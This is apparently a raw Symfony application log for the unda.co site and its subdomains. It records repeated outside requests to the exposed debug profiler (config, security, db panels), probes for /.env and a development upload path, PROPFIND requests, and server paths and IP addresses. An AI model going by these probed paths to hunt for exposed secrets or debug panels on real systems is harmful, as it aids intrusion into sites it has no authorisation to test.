[2025-12-20 06:23:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 06:23:35] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-20 06:23:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-20 06:26:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=twig","method":"GET"} []
[2025-12-20 06:26:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 06:35:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 06:44:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48f71a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48f71a","method":"GET"} []
[2025-12-20 06:44:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 06:47:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=34.223.102.8&limit=10&method=GET","method":"GET"} []
[2025-12-20 06:47:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=34.223.102.8&limit=10&method=GET","method":"GET"} []
[2025-12-20 06:56:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8","method":"GET"} []
[2025-12-20 06:56:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 07:00:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=security","method":"GET"} []
[2025-12-20 07:00:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 07:01:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a7fe89","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a7fe89?panel=events","method":"GET"} []
[2025-12-20 07:01:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 07:06:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 07:08:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3259f5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3259f5?panel=swiftmailer","method":"GET"} []
[2025-12-20 07:08:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 07:19:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=twig","method":"GET"} []
[2025-12-20 07:19:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 07:20:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=config","method":"GET"} []
[2025-12-20 07:20:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 07:30:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0d34b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0d34b","method":"GET"} []
[2025-12-20 07:30:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 07:30:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dbbcb1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dbbcb1","method":"GET"} []
[2025-12-20 07:30:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 07:30:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7e4910","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7e4910?panel=router","method":"GET"} []
[2025-12-20 07:30:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 07:30:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a1fd62","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a1fd62?panel=twig","method":"GET"} []
[2025-12-20 07:30:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 07:30:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 07:30:46] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 07:30:46] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 07:30:46] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 07:30:46] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 07:30:46] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 07:30:46] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 07:31:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=5.181.190.248&limit=10&method=GET","method":"GET"} []
[2025-12-20 07:31:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=5.181.190.248&limit=10&method=GET","method":"GET"} []
[2025-12-20 07:31:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"14b2f9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/14b2f9?panel=time","method":"GET"} []
[2025-12-20 07:31:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 07:36:43] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 07:43:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=time","method":"GET"} []
[2025-12-20 07:43:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 07:45:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"106750","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/106750","method":"GET"} []
[2025-12-20 07:45:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 07:49:24] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"52b0f2","_route":"_profiler_exception"},"request_uri":"https://www.unda.co/_profiler/52b0f2/exception","method":"GET"} []
[2025-12-20 07:49:24] php.CRITICAL: Call to a member function getCollector() on null {"exception":"[object] (Symfony\\Component\\Debug\\Exception\\FatalThrowableError(code: 0): Call to a member function getCollector() on null at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php:61)"} []
[2025-12-20 07:49:24] request.CRITICAL: Uncaught PHP Exception Symfony\Component\Debug\Exception\FatalThrowableError: "Call to a member function getCollector() on null" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php line 61 {"exception":"[object] (Symfony\\Component\\Debug\\Exception\\FatalThrowableError(code: 0): Call to a member function getCollector() on null at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php:61)"} []
[2025-12-20 07:59:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32d5b3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32d5b3?panel=form","method":"GET"} []
[2025-12-20 07:59:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 07:59:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 08:04:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=db","method":"GET"} []
[2025-12-20 08:04:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 08:05:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=security","method":"GET"} []
[2025-12-20 08:05:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 08:05:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=logger","method":"GET"} []
[2025-12-20 08:05:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 08:08:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"86d84d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/86d84d","method":"GET"} []
[2025-12-20 08:08:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 08:11:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:11:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2263c2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2263c2?panel=config","method":"GET"} []
[2025-12-20 08:11:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 08:13:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:13:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:13:13] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-20 08:13:13] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-20 08:13:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 08:13:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 08:13:13] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 08:13:13] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 08:13:13] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 08:13:13] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 08:13:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:13:17] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-20 08:13:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:13:21] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-20 08:13:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:13:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
[2025-12-20 08:13:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"86adc0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/86adc0?panel=cache","method":"GET"} []
[2025-12-20 08:13:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 08:15:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:15:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"POST"} []
[2025-12-20 08:15:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:15:42] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-20 08:15:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 08:15:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 08:15:42] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 08:15:42] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 08:15:42] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 08:15:42] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 08:19:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 08:22:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=events","method":"GET"} []
[2025-12-20 08:22:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 08:26:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=request","method":"GET"} []
[2025-12-20 08:26:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 08:27:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eed248","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eed248","method":"GET"} []
[2025-12-20 08:27:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 08:29:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5e3cf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5e3cf1?panel=cache","method":"GET"} []
[2025-12-20 08:29:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 08:33:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
[2025-12-20 08:33:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-20 08:35:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2","method":"GET"} []
[2025-12-20 08:35:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 08:46:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=config","method":"GET"} []
[2025-12-20 08:46:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
